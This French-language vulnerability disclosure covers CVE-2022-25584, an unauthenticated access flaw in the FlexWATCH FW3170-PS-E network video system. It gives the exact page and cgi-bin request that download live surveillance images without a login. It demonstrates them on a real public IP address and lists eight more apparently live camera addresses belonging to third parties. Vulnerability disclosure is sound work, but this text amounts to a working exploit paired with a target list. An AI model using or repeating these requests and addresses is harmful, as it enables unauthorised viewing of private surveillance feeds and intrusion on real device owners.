
Flexwatch-CVE
Flexwatch-CVE
Ce document concerne le CVE-2022-25584 « RÉSERVÉ »
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

Cette vulnérabilité a été indexée par le CNVD, mais n'a pas encore été rendue publique
CNVD ID:CNVD-2021-103443

Vulnérabilité à reproduire :
Nous avons découvert que le FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY, propriété de Seyeon Tech Co., Ltd., présente une vulnérabilité d'accès non authentifié, qui peut être exploitée par des attaquants pour obtenir des images de surveillance et divulguer des informations sensibles.
Par exemple :
http://211.174.227.102:10001/app/multi/single.asp

Ensuite, nous pouvons visiter : http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
Télécharger l'écran en temps réel de la surveillance


Site web officiel de l'entreprise : http://www.flexwatch.com/
Autres cas :
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp